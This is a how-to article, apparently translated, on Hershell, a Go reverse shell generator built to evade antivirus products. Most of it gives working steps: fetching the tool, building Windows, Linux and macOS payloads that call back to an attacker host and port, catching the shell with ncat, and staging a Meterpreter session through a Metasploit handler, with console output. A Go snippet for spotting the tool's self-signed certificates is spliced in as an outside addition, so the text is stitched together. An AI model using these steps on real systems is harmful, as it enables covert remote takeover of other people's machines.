2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains what kind of generator Hershell is. Most people are not very familiar with it, so the article is shared here for reference.
Hershell is a cross-platform reverse shell generator. The tool is written in Go and is built around a TCP reverse shell.
The tool uses TLS to secure its communication and provides certificate public key fingerprint pinning to prevent the traffic from being intercepted.
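On the defensive side, the server certificate behind this TLS channel is self-signed with a 3650-day lifetime (see the `openssl req` command further down), and both properties are visible in the TLS handshake. The Go example below is added here and is not part of Hershell or the original article; it builds a constructed certificate with those properties and flags them. `Triage`, `sampleCert`, the 398-day threshold and the use of Ed25519 in place of RSA-4096 are assumptions made for illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

const maxValidity = 398 * 24 * time.Hour // assumed triage threshold, not from the article

// Triage flags a certificate that is self-signed (verifies under its own key) or long-lived.
func Triage(cert *x509.Certificate) []string {
	var flags []string
	if cert.Issuer.String() == cert.Subject.String() &&
		cert.CheckSignature(cert.SignatureAlgorithm, cert.RawTBSCertificate, cert.Signature) == nil {
		flags = append(flags, "self-signed")
	}
	if cert.NotAfter.Sub(cert.NotBefore) > maxValidity {
		flags = append(flags, "long validity")
	}
	return flags
}

// sampleCert builds constructed demo data mirroring the article's CN and 3650-day lifetime.
func sampleCert() (*x509.Certificate, error) {
	pub, key, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: "yourcn.com"},
		NotBefore: time.Now(), NotAfter: time.Now().Add(3650 * 24 * time.Hour)}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, pub, key)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

func main() {
	cert, err := sampleCert()
	if err != nil {
		panic(err)
	}
	fmt.Println(Triage(cert)) // [self-signed long validity]
}
```

Either flag on its own is common for internal services, so treat the result as a triage signal to combine with destination and process context rather than as a verdict.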
Supported systems
The current version of Hershell supports the following operating systems:
Windows
Linux
macOS
FreeBSD
Development purpose
Although a Meterpreter payload can sometimes be used, it is easily detected by antivirus products. Hershell was created for that reason: it provides a TCP-based reverse shell and supports a variety of operating system platforms.
Usage and dependencies
Hershell is written in Go. First set up a Go environment on your device by following the official Go documentation, and set the $GOPATH environment variable.
Next, run the following command to get the project source code:
```
go get github.com/lesnuages/hershell
```
Building the payload
When building a Payload, we can choose to use the provided Makefile to complete the build. At this point, we need to set the following environment variables:
GOOS: target operating system
GOARCH: target architecture
LHOST: attacker IP or host domain name
LPORT: listener port
The Makefile also provides the following targets:
depends: generates the server certificate (required by the reverse shell)
windows32: builds a 32-bit Windows executable (PE 32-bit)
windows64: builds a 64-bit Windows executable (PE 64-bit)
linux32: builds a 32-bit Linux executable (ELF 32-bit)
linux64: builds a 64-bit Linux executable (ELF 64-bit)
macos32: builds a 32-bit macOS executable (Mach-O)
macos64: builds a 64-bit macOS executable (Mach-O)
For the target platform in the above list, we also need to set two environment variables, LHOST and LPORT.
Using the reverse shell
Once executed, the tool provides a remote shell. It is a custom interactive shell that lets us run system commands through cmd.exe on Windows or /bin/sh on Unix devices.
The specific commands supported by Hershell are listed below:
run_shell: get a system shell
inject: injects a shellcode (Base64-encoded) into the memory of the same process and executes it.
meterpreter [tcp|http|https] IP:PORT: connects to a multi handler and gets a second-stage reverse TCP, HTTP, or HTTPS Meterpreter from Metasploit, then executes the shellcode in memory (this feature currently only supports the Windows platform).
exit: exit the program
Usage
First, we need to generate a valid certificate using the following command:
```
$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
.... . +. + +
writing new private key to 'server.key'
-----
cat server.key >> server.pem
```
For the Windows platform:
```
# Predefined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
```
For the Linux platform:
```
# Predefined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predefined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
```
For the macOS platform:
```
$ make macos LHOST=192.168.0.12 LPORT=1234
```
Usage examples
Basic usage
We can use a variety of tools to handle incoming connections, such as:
socat
ncat
openssl server module
Metasploit handlers (python/shell_reverse_tcp_ssl payload)
Here is an example using ncat:
```
$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab
```
Meterpreter scenario
Note: currently, this feature is only supported on the Windows platform.
The Meterpreter usage scenario of this tool currently supports only the following Payload:
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_http
windows/x64/meterpreter/reverse_http
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
When you choose a payload, don't forget to choose the matching transport (tcp, http, or https).
An example Meterpreter handler setup:
```
[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
```
Next, in hershell, use the meterpreter command:
```
[hershell]> meterpreter https 172.16.122.105:8443
```
At this point, a new Meterpreter session appears in msfconsole:
```
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105 (UUID: pqzl9t5k) Staging x64 payload (206937 bytes)...
[*] Meterpreter session 1 opened (172.16.122.105) at 2018-01-29 14:16:44 +0100
[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab
```
That is all the content of the article "What kind of generator is Hershell?". Thank you for reading!